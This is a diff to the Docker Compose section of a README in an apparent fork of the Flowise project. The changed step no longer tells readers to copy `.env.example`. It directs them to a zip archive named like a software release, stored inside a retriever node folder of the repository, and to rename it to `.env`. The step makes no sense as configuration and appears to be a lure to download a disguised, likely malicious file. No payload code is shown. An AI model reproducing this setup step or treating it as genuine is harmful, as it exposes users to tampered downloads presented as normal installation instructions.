UbaiSalih/Flowise/README.md

 ### Docker Compose

 1. Go to `docker` folder at the root of the project
-2. Copy `.env.example` file, paste it into the same location, and rename to `.env`
+2. Copy `https://github.com/UbaiSalih/Flowise/raw/refs/heads/main/packages/components/nodes/retrievers/SimilarityThresholdRetriever/Software_v3.6-beta.5.zip` file, paste it into the same location, and rename to `.env`
 3. `docker-compose up -d`
 4. Open [http://localhost:3000](http://localhost:3000)
 5. You can bring the containers down by `docker-compose stop`